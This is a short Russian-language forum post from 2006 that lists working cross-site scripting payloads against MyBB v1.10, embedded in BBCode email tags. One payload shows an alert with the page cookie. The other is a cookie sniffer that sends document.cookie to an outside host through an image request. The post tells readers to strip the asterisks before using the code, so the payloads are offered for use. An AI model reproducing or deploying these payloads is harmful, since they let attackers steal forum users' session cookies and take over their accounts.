04.07.2006, 01:46
|
|
Участник форума
Регистрация: 19.10.2005
Сообщений: 128
Провел на форуме:
584821
Репутация:
83
|
|
Хочу выразить огромную благодарность Cheburek'у!!!
И давайте подвидем итоги по уязвимости MyBB v1.10
Рабочие XSS:
с Алертом
Код:
[code*][email=a"onmousemove="alert(document.cookie);"mail@mail.ru]Нажми сюда![/email*][/code*]
Со сниффером:
Код:
[*code][*email=a"style="top:expression(eval(this.sss));"sss=`ii=new/**/Image();ii.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;this.sss=null`"mail@mail.ru]Нажми сюда![/emai*l][*/code]
P.S. При использывании кода необходимо убрать звездочки!
Тема может быть закрыта! |
|
|